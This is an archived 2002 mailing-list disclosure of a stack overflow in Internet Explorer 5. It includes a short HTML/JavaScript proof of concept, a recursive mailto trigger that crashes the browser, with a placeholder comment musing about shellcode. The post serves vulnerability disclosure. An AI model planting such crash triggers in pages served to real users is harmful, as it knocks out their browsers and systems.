|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Matias Sedalo (s0t4ipv6
shellcode.com.ar)Date: Sun Jun 02 2002 - 16:08:24 CDT
the 28/07/1999 I have discovered a stack buffer overflow caused by until
the moment all the versions of the Internet Explorer.
In many windows98 causes the necessity to reinitiate the equipment, since
to my to seem it remains without memory.
Only it has been proven in several versions 5 of IE on WindowsNT
server sp6 and windows98 Second Edition. As I said before the Windows 98
I had to reinitiate it to the force.
Can be possible to execute arbitrary code using the variable company of
the example?
// internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
// internet Explorer 5.00.3500.1003 on Windows98se
-----------cut here---------------------------
<html><head></head>
<script language="JAVASCRIPT">
function hacerMail() {
var company;
crear();
address="s0t4ipv6shellcode.com.ar";
soporte();
}
function soporte(){
var soporte="billmocosoft.com";
window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
// window.location=company; // also this line cause the bof.
close(hacerMail());
}
function crear(){
company="shellcode here?\n"; // i don't think so.
}
</script>
<input type="button" onClick="hacerMail();" value="SMASH!"></input>
</html>
-----------cut here---------------------------
Regards.
- Internet es perjudicial para la salud -
- Ley N~ 127.0.0.1
Matias Sedalo
http://www.shellcode.com.ar
s0t4ipv6shellcode.com.ar
B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
........................................
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]